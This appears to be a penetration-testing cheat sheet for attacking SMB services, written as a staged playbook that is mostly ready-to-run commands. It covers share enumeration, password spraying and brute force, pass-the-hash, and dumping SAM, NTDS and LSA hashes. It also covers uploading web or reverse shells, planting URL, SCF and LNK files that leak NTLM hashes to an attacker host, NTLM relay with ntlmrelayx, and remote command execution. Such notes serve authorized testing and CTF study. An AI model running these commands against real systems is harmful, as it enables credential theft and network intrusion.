139 , 445 SMB

Nmap Enumeration

nmap --script=smb-* -p 445 10.10.10.10 -o smb-enum.txt

nmap --script=smb-enum-shares.nse -p 445 10.10.10.10 -o smb-enum.txt

Stage 0 - No Credentials [Listing shares]

nxc smb <target_ip> --shares

nxc smb --list-shares -t 10.10.11.11

nxc smb <target_ip> -u '' -p '' --shares

smbmap -H 10.10.10.10

smbclient -L 10.10.10.10

smbclient -L //10.10.10.10 -N

Stage 1 - No Credentials [Checking Anonymous / Guest Login possible]

nxc smb 10.10.10.248 -u 'anonymous' -p ''

nxc smb <target_ip> -u 'guest' -p ''

smbmap -u guest -H 10.10.10.192

Stage 2 - Credentials Enumeration

User Enumeration

nxc smb $ip -u '' -p '' --users

Password enumeration

nxc smb $ip -u username -p pass.txt --continue-on-success

Password Spray

nxc smb $ip -u users.txt -p NewIntelligenceCorpUser9876 --continue-on-success

Brute Force

nxc smb 10.10.10.248 -u users.txt -p pass.txt --continue-on-success

#For HASH
nxc smb 10.10.10.248 -u users.txt -H hashes.txt --continue-on-success

Stage 3 - Authentication

Basic Auth (no password)

smbclient -N //10.10.10.123/Development

Basic Auth

smbclient //<IP_Address>/<Share_Name> -U <Username>

smbclient //10.10.10.123/Development
# or
smbclient '\\\\10.10.10.123\\Department shares'

Domain Auth

smbclient //192.168.112.173/Apps -U laser.com/eric.wallows%EricLikesRunning800

nxc smb --domain finance.corp --user john.doe --password P@ssw0rd123 -t 192.168.1.10

kerberos Login

smbclient -k //<IP_Address>/<Share_Name>

Using NTLM Hash [also known as PTH = pass-the-hash]

nxc smb <target_ip> -u <username> --hashes <LM:NT>

Stage 4 - SMB Enumeration [Read ACCESS]

Download files

smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

Enumerate Logged-on-Users

nxc smb <target_ip> -u <username> -p <password> --loggedon-users

GPP Passwords

nxc smb <target_ip> -u <username> -p <password> --gpp

Dump hashes

nxc smb <target_ip> -u <username> -p <password> --sam
nxc smb <target_ip> -u <username> -p <password> --ntds
nxc smb <target_ip> -u <username> -p <password> --lsa

Stage 5 - SMB File Upload [Read & Write ACCESS]

web shell / Reverse Shell

smb: \> put shell.aspx

NTLM Hash Capture - [Phishing]

Try capturing NTLM hash by uploading SCF / URL / LNK files

URL file

[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\10.10.10.10\%USERNAME%.icon
IconIndex=1

SCF file

[Shell]
Command=2
IconFile=\\ATTACKER_IP\share\icon.ico
[Taskbar]
Command=ToggleDesktop

LNK file

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\192.168.45.202\@threat.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the dir this file lives in will perform an authentication request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Use tool to create any type of file to steal NTLM hash
- https://github.com/Greenwolf/ntlm_theft
- https://github.com/xct/hashgrab

NTLM Relay Atttack

In order to perform this attack, the victim must visit the SMB directory only then we are able to capture the hash.

create file ip.txt including all the ip's
check smb signing = false

nxc smb ip.txt
SMB 192.168.205.174 445    MS02    (signing:False) (SMBv1:False) 
SMB 192.168.205.173 445    MS01    (signing:False) (SMBv1:False) 
SMB 192.168.205.172 445    DC01    (signing:True) (SMBv1:False)

Put all the ip's (or even single ip) in targets.txt and run below command

impacket-ntlmrelayx -tf targets.txt -smb2support --no-http-server

When user visit the SMB directory, we will get the hash.

Direct Execute commands

nxc smb <target_ip> -u <username> -p <password> -x '<command>'

NT_STATUS_PASSWORD_MUST_CHANGE

if found password , but gives this error then we must change the password

sudo smbpasswd -r 10.10.10.193 username

smbpasswd -r 10.10.10.193 -U tlavel

Previous135 MSRPC Next143 , 993 IMAP

Last updated 3 months ago